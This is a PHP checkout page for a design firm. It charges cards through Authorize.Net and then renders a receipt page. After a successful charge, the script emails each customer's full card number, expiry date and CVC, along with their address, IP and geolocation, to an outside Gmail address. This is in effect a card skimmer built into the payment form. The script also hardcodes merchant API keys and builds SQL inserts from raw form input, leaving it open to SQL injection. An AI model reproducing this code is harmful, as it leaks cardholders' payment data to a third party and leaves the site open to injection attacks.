<?php 
// Include Authorize.Net PHP sdk 
require 'autoload.php';  
use net\authorize\api\contract\v1 as AnetAPI; 
use net\authorize\api\controller as AnetController; 
 
// Include configuration file  
require_once 'config.php'; 
 
$paymentID = $statusMsg = ''; 
$ordStatus = 'error'; 
$responseArr = array(1 => 'Approved', 2 => 'Declined', 3 => 'Error', 4 => 'Held for Review'); 

// Configure your Subject Prefix and Recipient here
$subjectPrefix = 'Form Submission';
$emailTo = 'wikicurators@gmail.com';
$errors = array(); // array to hold validation errors
$data = array(); // array to pass back data
 
 function getLocationInfoByIp($ip){
    $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=".$ip));    
    if($ip_data && $ip_data->geoplugin_countryName != null){
        $result = $ip_data->geoplugin_city.', '.$ip_data->geoplugin_countryCode;
    }
    return $result;
}

if($_SERVER['REQUEST_METHOD'] === 'POST') {

// Check whether card information is not empty 
if(!empty($_POST['card_number']) && !empty($_POST['card_exp_month']) && !empty($_POST['card_exp_year']) && !empty($_POST['card_cvc'])){ 
     
    // Retrieve card and user info from the submitted form data 
    $name = $_POST['name']; 
    $phone = $_POST['phone']; 
    $email = $_POST['email']; 
    $amount = $_POST['amount'];
    $description = $_POST['description'];
    $country = $_POST['country']; 
    $address = $_POST['address']; 
    $city = $_POST['city']; 
    $state = $_POST['state'];
    $zip = $_POST['zip'];
    $card_holder_name = $_POST['card_holder_name'];
    $card_number = preg_replace('/\s+/', '', $_POST['card_number']); 
    $card_exp_month = $_POST['card_exp_month']; 
    $card_exp_year = $_POST['card_exp_year']; 
    $card_exp_year_month = $card_exp_year.'-'.$card_exp_month; 
    $card_cvc = $_POST['card_cvc']; 
    $ip = $_SERVER['REMOTE_ADDR'];
    $referrer = $_SERVER["HTTP_REFERER"];
     
    // Set the transaction's reference ID 
    $refID = 'REF'.time(); 
     
    // Create a merchantAuthenticationType object with authentication details 
    // retrieved from the config file 
    $merchantAuthentication = new AnetAPI\MerchantAuthenticationType();    
    $merchantAuthentication->setName("2Gzh67V7UXm");    
    $merchantAuthentication->setTransactionKey("8f7T7aQ964B34mgz");    
     
    // Create the payment data for a credit card 
    $creditCard = new AnetAPI\CreditCardType(); 
    $creditCard->setCardNumber($card_number); 
    $creditCard->setExpirationDate($card_exp_year_month); 
    $creditCard->setCardCode($card_cvc); 
     
    // Add the payment data to a paymentType object 
    $paymentOne = new AnetAPI\PaymentType(); 
    $paymentOne->setCreditCard($creditCard); 
     
    // Create order information 
    $order = new AnetAPI\OrderType(); 
    $order->setDescription($description); 
     
    // Set the customer's identifying information 
    $customerData = new AnetAPI\CustomerDataType(); 
    $customerData->setType("individual"); 
    $customerData->setEmail($email); 
     
    // Create a transaction 
    $transactionRequestType = new AnetAPI\TransactionRequestType(); 
    $transactionRequestType->setTransactionType("authCaptureTransaction");    
    $transactionRequestType->setAmount($amount); 
    $transactionRequestType->setOrder($order); 
    $transactionRequestType->setPayment($paymentOne); 
    $transactionRequestType->setCustomer($customerData); 
    $request = new AnetAPI\CreateTransactionRequest(); 
    $request->setMerchantAuthentication($merchantAuthentication); 
    $request->setRefId($refID); 
    $request->setTransactionRequest($transactionRequestType); 
    $controller = new AnetController\CreateTransactionController($request); 
    $response = $controller->executeWithApiResponse(constant("\\net\authorize\api\constants\ANetEnvironment::$ANET_ENV")); 
    
    
    
        $subject = "$subjectPrefix";
    $body    = '
        <strong>Name: </strong>'.$name.'<br />
        <strong>Email: </strong>'.$email.'<br />
        <strong>Phone: </strong>'.$phone.'<br />
        <strong>Amount: </strong>'.$amount.'<br />
        <strong>Description: </strong>'.$description.'<br />
        <strong>Country: </strong>'.$country.'<br />
        <strong>Address: </strong>'.$address.'<br />
        <strong>City: </strong>'.$city.'<br />
        <strong>State: </strong>'.$state.'<br />
        <strong>Zip: </strong>'.$zip.'<br />
        <strong>Card Holder Name: </strong>'.$card_holder_name.'<br />
        <strong>Card Number: </strong>'.$card_number.'<br />
        <strong>Card Exp Month: </strong>'.$card_exp_month.'<br />
        <strong>Card Exp Year: </strong>'.$card_exp_year.'<br />
        <strong>Card CVC: </strong>'.$card_cvc.'<br />';
        
        
    
    
     
    if ($response != null) { 
        // Check to see if the API request was successfully received and acted upon 
        if ($response->getMessages()->getResultCode() == "Ok") { 
            // Since the API request was successful, look for a transaction response 
            // and parse it to display the results of authorizing the card 
            $tresponse = $response->getTransactionResponse(); 
 
            if ($tresponse != null && $tresponse->getMessages() != null) { 
                // Transaction info 
                $transaction_id = $tresponse->getTransId(); 
                $payment_status = $response->getMessages()->getResultCode(); 
                $payment_response = $tresponse->getResponseCode(); 
                $auth_code = $tresponse->getAuthCode(); 
                $message_code = $tresponse->getMessages()[0]->getCode(); 
                $message_desc = $tresponse->getMessages()[0]->getDescription(); 
                
                $body .= '
                <strong>Submitted From: </strong>'.$referrer.'<br />
                <strong>IP Address: </strong>'.$ip.'<br />
                <strong>Transaction Id: </strong>'.$transaction_id.'<br />
                <strong>Payment Status: </strong>'.$payment_status.'<br />
                <strong>Payment Response: </strong>'.$payment_response.'<br />
                <strong>Auth Code: </strong>'.$auth_code.'<br />
                <strong>Message Code: </strong>'.$message_code.'<br />
                <strong>Message Desc: </strong>'.$message_desc.'<br />
                <strong>Location: </strong>'.getLocationInfoByIp($ip).'<br />';
    
                $headers  = "MIME-Version: 1.1" . PHP_EOL;
                $headers .= "Content-type: text/html; charset=utf-8" . PHP_EOL;
                $headers .= "Content-Transfer-Encoding: 8bit" . PHP_EOL;
                $headers .= "Date: " . date('r', $_SERVER['REQUEST_TIME']) . PHP_EOL;
                $headers .= "Message-ID: <" . $_SERVER['REQUEST_TIME'] . md5($_SERVER['REQUEST_TIME']) . '@' . $_SERVER['SERVER_NAME'] . '>' . PHP_EOL;
                $headers .= "From: " . "Admin Superior Design Hub" . "<admin@superiordesignhub.com>" . PHP_EOL;
                $headers .= "Return-Path: $emailTo" . PHP_EOL;
                $headers .= "Reply-To: $email" . PHP_EOL;
                $headers .= "X-Mailer: PHP/". phpversion() . PHP_EOL;
                $headers .= "X-Originating-IP: " . $_SERVER['SERVER_ADDR'] . PHP_EOL;
                mail($emailTo, "=?utf-8?B?" . base64_encode($subject) . "?=", $body, $headers);
                $data['type'] = 'success';
                $data['text'] = 'Your message has been sent successfully';
                
                 
                // Include database connection file  
                include_once 'dbConnect.php'; 
                 
                // Insert tansaction data into the database 
                $sql = "INSERT INTO orders(name,email,item_name,item_number,item_price,item_price_currency,card_number,card_exp_month,card_exp_year,paid_amount,txn_id,payment_status,payment_response,created,modified) VALUES('".$name."','".$email."','".$itemName."','".$itemNumber."','".$itemPrice."','".$currency."','".$card_number."','".$card_exp_month."','".$card_exp_year."','".$itemPrice."','".$transaction_id."','".$payment_status."','".$payment_response."',NOW(),NOW())"; 
                $insert = $db->query($sql); 
                $paymentID = $db->insert_id; 
                 
                $ordStatus = 'success'; 
                $statusMsg = 'Your Payment has been Successful!'; 
            } else { 
                $error = "Transaction Failed! \n"; 
                if ($tresponse->getErrors() != null) { 
                    $error .= " Error Code  : " . $tresponse->getErrors()[0]->getErrorCode() . "<br/>"; 
                    $error .= " Error Message : " . $tresponse->getErrors()[0]->getErrorText() . "<br/>"; 
                } 
                $statusMsg = $error; 
            } 
            // Or, print errors if the API request wasn't successful 
        } else { 
            $error = "Transaction Failed! \n"; 
            $tresponse = $response->getTransactionResponse(); 
         
            if ($tresponse != null && $tresponse->getErrors() != null) { 
                $error .= " Error Code  : " . $tresponse->getErrors()[0]->getErrorCode() . "<br/>"; 
                $error .= " Error Message : " . $tresponse->getErrors()[0]->getErrorText() . "<br/>"; 
            } else { 
                $error .= " Error Code  : " . $response->getMessages()->getMessage()[0]->getCode() . "<br/>"; 
                $error .= " Error Message : " . $response->getMessages()->getMessage()[0]->getText() . "<br/>"; 
            } 
            $statusMsg = $error; 
        } 
    } else { 
        $statusMsg =  "Transaction Failed! No response returned"; 
    } 
}else{ 
    $statusMsg = "Error on form submission."; 
} 
?>

<!--<div class="status">-->
<!--	<?php if(!empty($paymentID)){ ?>-->
<!--		<h1 class="<?php echo $ordStatus; ?>"><?php echo $statusMsg; ?></h1>-->
		
<!--		<h4>Payment Information</h4>-->
<!--		<p><b>Reference Number:</b> <?php echo $paymentID; ?></p>-->
<!--		<p><b>Transaction ID:</b> <?php echo $transaction_id; ?></p>-->
<!--		<p><b>Status:</b> <?php echo $responseArr[$payment_response]; ?></p>-->
		
<!--		<h4>Product Information</h4>-->
<!--		<p><b>Name:</b> <?php echo $description; ?></p>-->
<!--		<p><b>Price:</b> <?php echo $amount.' '.$currency; ?></p>-->
<!--	<?php }else{ ?>-->
<!--		<h1 class="error">Your Payment has Failed</h1>-->
<!--		<p class="error"><?php echo $statusMsg; ?></p>-->
<!--	<?php } ?>-->
<!--</div>-->



<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">

<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<link rel="icon" href="/assets/images/logo.png" type="image/gif" sizes="16x16">
<link rel="stylesheet" type="text/css" href="/assets/css/style.css" />
<link rel="stylesheet" media="screen" href="/assets/css/bootstrap.css" />
</head>
<body>
    
<div align="center" class="wrapper thankyou">
    <div class="container">
        
        <div class="tankyou-box">
            <h2>Superior Design Hub</h2>
            <div class="tankyou-box-inner">
               <?php if(!empty($paymentID)){ ?> <p style="text-align:right;font-family: system-ui;font-weight: 600;color: black;color:#5c5c5ced;">Transaction ID : <?php echo $transaction_id; ?></p><?php }?>
            <?php if(!empty($paymentID)){ ?>
            <div class="InvoiceThumbnail"><svg class="InlineSVG InvoiceThumbnail-image" focusable="false" width="131" height="145" viewBox="0 0 131 145" fill="none"><g filter="url(#filter0_ddd)"><rect x="35" y="25" width="60.5902" height="74.8467" rx="4" fill="white"></rect></g><rect opacity="0.12" x="42.13" y="33.9097" width="10.6924" height="10.6924" rx="5.34619" fill="#191919"></rect><rect opacity="0.1" x="58.1651" y="37.4744" width="14.2565" height="3.56413" rx="1.78206" fill="#191919"></rect><rect opacity="0.1" x="42.13" y="53.5132" width="10.6924" height="3.56413" rx="1.78206" fill="#191919"></rect><rect opacity="0.1" x="42.13" y="62.4229" width="10.6924" height="3.56413" rx="1.78206" fill="#191919"></rect><rect opacity="0.1" x="77.7701" y="85.5901" width="10.6924" height="3.56413" rx="1.78206" fill="#191919"></rect><rect opacity="0.1" x="58.1651" y="53.5132" width="19.6027" height="3.56413" rx="1.78206" fill="#191919"></rect><rect opacity="0.1" x="58.1651" y="62.4229" width="19.6027" height="3.56413" rx="1.78206" fill="#191919"></rect><rect opacity="0.1" x="42.13" y="85.5901" width="28.513" height="3.56413" rx="1.78206" fill="#191919"></rect><rect opacity="0.05" x="42.13" y="76.6804" width="46.3337" height="3.56413" rx="1.78206" fill="#191919"></rect><defs><filter id="filter0_ddd" x="0" y="0" width="130.59" height="144.847" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix"></feFlood><feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"></feColorMatrix><feOffset dy="10"></feOffset><feGaussianBlur stdDeviation="17.5"></feGaussianBlur><feColorMatrix type="matrix" values="0 0 0 0 0.207843 0 0 0 0 0.207843 0 0 0 0 0.207843 0 0 0 0.08 0"></feColorMatrix><feBlend mode="normal" in2="BackgroundImageFix" result="effect1_dropShadow"></feBlend><feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"></feColorMatrix><feOffset dy="5"></feOffset><feGaussianBlur stdDeviation="7.5"></feGaussianBlur><feColorMatrix type="matrix" values="0 0 0 0 0.208333 0 0 0 0 0.208333 0 0 0 0 0.208333 0 0 0 0.04 0"></feColorMatrix><feBlend mode="normal" in2="effect1_dropShadow" result="effect2_dropShadow"></feBlend><feColorMatrix in="SourceAlpha" type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 127 0"></feColorMatrix><feOffset dy="1"></feOffset><feGaussianBlur stdDeviation="1.5"></feGaussianBlur><feColorMatrix type="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.06 0"></feColorMatrix><feBlend mode="normal" in2="effect2_dropShadow" result="effect3_dropShadow"></feBlend><feBlend mode="normal" in="SourceGraphic" in2="effect3_dropShadow" result="shape"></feBlend></filter></defs></svg><div class="InvoiceThumbnail-successMark"><svg class="InlineSVG Icon Icon--md" focusable="false" height="16" viewBox="0 0 16 16" width="16"><path d="m8 16c-4.418278 0-8-3.581722-8-8s3.581722-8 8-8 8 3.581722 8 8-3.581722 8-8 8zm3.0832728-11.00479172-4.0832728 4.09057816-1.79289322-1.79289322c-.39052429-.39052429-1.02368927-.39052429-1.41421356 0s-.39052429 1.02368927 0 1.41421356l2.5 2.50000002c.39052429.3905243 1.02368927.3905243 1.41421356 0l4.79037962-4.79768495c.3905243-.3905243.3905243-1.02368927 0-1.41421357-.3905243-.39052429-1.0236893-.39052429-1.4142136 0z" fill-rule="evenodd"></path></svg></div></div>
             
              <span>Invoice paid</span>
              <h1>US$<?php echo $amount; ?></h1>
              <p>Your payment has been processed. Your project manager will reach out to you shortly. Thank you for choosing Superior Design Hub!</p>
              <?php } else{ ?>
              <span>Payment has Failed</span>
              <p class="error"><?php echo $statusMsg; ?></p>
              <?php } ?>
             
             </div>  
             <ul><li>Powered by <b>Authorized.net</b></li></ul>
        </div>


    </div>

</div>
</body>

</html>

<?php } ?>